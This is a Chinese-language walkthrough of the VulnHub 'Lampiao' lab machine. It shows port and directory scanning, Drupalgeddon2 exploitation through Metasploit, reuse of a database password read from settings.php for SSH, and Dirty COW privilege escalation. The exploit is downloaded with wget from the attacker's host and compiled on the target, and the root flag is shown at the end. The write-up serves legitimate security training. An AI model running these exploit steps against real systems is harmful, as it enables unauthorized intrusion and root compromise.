vulnhub Lampiao实战 – 作者:umbrella1CE

2-vulnhub Lampiao实战

简介:

  • 下载地址为:https://www.vulnhub.com/entry/lampiao-1,249/

  • 本次的靶机ip为192.168.3.13(桥接模式自动获取)

一、信息搜集

1.扫描ip
image

2.扫描端口这里使用nmap进行:

(开始只扫描出来80和22未果,后来反应过来,有可能网站还有其它端口可以访问,因为-sS参数是扫描常用的1000以内的端口号。于是用-p-参数:nmap -p- 192.168.3.13)
这里有三个端口先访问网站,发现如下是个静态页面什么也没有、文件头,源代码中无有效信息。 只好先看1898

nmap -p 1-65535 -sV 192.168.3.13
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-06 00:56 CST
Nmap scan report for 192.168.3.13
Host is up (0.00046s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.7 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http?
1898/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :

3.扫描目录这里使用dirb:

dirb http://192.168.3.13:1898/
---- Scanning URL: http://192.168.3.13:1898/ ----
==> DIRECTORY: http://192.168.3.13:1898/includes/
+ http://192.168.3.13:1898/index.php (CODE:200|SIZE:11400)
==> DIRECTORY: http://192.168.3.13:1898/misc/
==> DIRECTORY: http://192.168.3.13:1898/modules/
==> DIRECTORY: http://192.168.3.13:1898/profiles/
+ http://192.168.3.13:1898/robots.txt (CODE:200|SIZE:2189)
==> DIRECTORY: http://192.168.3.13:1898/scripts/
+ http://192.168.3.13:1898/server-status (CODE:403|SIZE:294)
==> DIRECTORY: http://192.168.3.13:1898/sites/
==> DIRECTORY: http://192.168.3.13:1898/themes/
+ http://192.168.3.13:1898/web.config (CODE:200|SIZE:2200)
+ http://192.168.3.13:1898/xmlrpc.php (CODE:200|SIZE:42)

4.相关信息:

内容管理系统(CMS) 
 Drupal 7
Web 服务器 
 Apache 2.4.7
编程语言 
 PHP 5.5.9
操作系统 
 Ubuntu
JavaScript 库
jQuery 1.4.4

二、进行getshell

1.1898端口查看录音 对网站进行信息搜集

这里访问首页发现最下面有一个文件LuizGonzaga-LampiaoFalou.mp3进行访问:http://192.168.3.13:1898/LuizGonzaga-LampiaoFalou.mp3
是一段录音似乎没什么用继续对网站进行信息搜集:
image

2.发现有robots.txt

进行查看一波发现http://192.168.3.13:1898/includes/处有目录遍历
再include里面看见有什么数据库的配置文件好像没什么用…因为之前信息搜集时发现他框架是Drupal 7所以这里可以进行一波漏洞搜集,百度查一下:
(使用2018年这个漏洞。Drupal 在3月28日爆出的一个远程代码执行漏洞,CVE编号CVE-2018-7600)分析及 PoC 构造:
image

3.使用msf
试一下:

use exploit/unix/webapp/drupal_drupalgeddon2
set RHOSTS 192.168.3.13
set RPORT 1898
shell

image

成功获取shell!

三、提权

1.进入Python交换式Shell:

执行shell获取交互式命令,由于我们获取的shell并不是一个具有完整交互的shell,对于已经安装了python的系统,我们可以使用python提供的pty模块,只需要一行脚本就可以创建一个原生的终端,命令如下:

python -c 'import pty; pty.spawn("/bin/bash")'

2.根据网上大佬的文章可以发现有四个没有发现的文件:

这里我们可以在本机电脑上进行查看(使用scp这里将不再进行描述)
image

查看结果:
qrc.png:一个二维码,扫出来的结果是 Try harger! muahuahuahua,被作者鼓励了。。
audio.m4a:提示为user tiago,说明要先找到用户tiago的密码这里先放到一边
uizGonzaga-LampiaoFalou.mp3:一首音乐刚刚听过,没有什么东西
lampiao.jpg:一张牛仔的图片,丢入binwlak中未发现有什么隐写

image

3.找到了用户名 查看配置文件(不知道密码)

但是我们不知道密码在前面我们看到了有databade所以说一般网站有数据库的配置文件
我们继续翻找配置信息在/var/www/html/sites/default文件当中我们在settings.php找到了配置文件
image

4.登录mysql

既然知道了数据库的账号和密码 我们可以登录一波:

mysql -u drupaluser -p
mysql -u drupaluser -p
Enter password: Virgulino

(这里有几个思路 我们可以在数据库当中查看密码 也可以自行使用九头蛇爆破 )
因为之前在配置文件当中看到了密码所以使用密码 Virgulino尝试登录一下刚刚提示的tiago用户,最后试了试mysql数据库root的密码,结果密码也是tiago的登陆密码,成功获取Mysql数据库的root权限。

5.ssh登录

既然我们已经知道了用户名密码 那么我们现在ssh可以进行登录:

账号:tiago
密码:Virgulino

6.登录成功、查看版本信息

继续进行信息搜集:

uname -a
Linux lampiao 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 i686 i686 GNU/Linux

7.这里使用脏牛提权

searchsploit dirty cow pri esc
查找脏牛提权的exp

searchsploit  -m  40847.cpp
-m   复制到当前目录下

进行下载:
搭建http服务进行EXP文件传输
python3 -m  http.server 8000

进行下载:wget http://192.168.3.12:8000/40847.cpp

8.进行编译生成一个 dcow文件:

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil

进行执行:
image
成功提权!!!!

9.找到flag

cd /root
root@lampiao:~# ls
flag.txt
root@lampiao:~# cat flag
cat: flag: No such file or directory
root@lampiao:~# cat flag.txt
9740616875908d91ddcdaa8aea3af366
root@lampiao:~#

来源:freebuf.com 2021-05-10 08:37:32 by: umbrella1CE

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论